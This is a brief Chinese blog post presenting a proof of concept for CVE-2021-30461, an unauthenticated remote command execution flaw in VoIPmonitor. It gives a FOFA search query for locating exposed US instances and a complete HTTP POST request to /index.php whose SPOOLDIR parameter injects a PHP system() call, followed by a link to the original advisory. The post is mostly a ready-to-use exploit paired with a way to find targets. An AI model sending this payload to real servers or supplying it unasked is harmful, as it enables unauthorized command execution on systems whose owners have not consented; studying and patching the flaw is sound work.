（CVE-2021-30461）VoIPmonitor UnAuth远程命令执行

FOFa

title="VoIPmonitor" && country="US"

漏洞界面长这样

POC

POST /index.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,vi;q=0.8,id;q=0.7,ja;q=0.6,zh-TW;q=0.5
Connection: close
Content-Length: 37

SPOOLDIR=test%22.system%28id%29.%22

参考链接

https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/

posted @ 2021-05-20 10:09 追得上的梦想阅读(393) 评论(0) 编辑收藏举报

刷新页面返回顶部

Paper_airplane

（CVE-2021-30461）VoIPmonitor UnAuth远程命令执行

FOFa

POC

参考链接

公告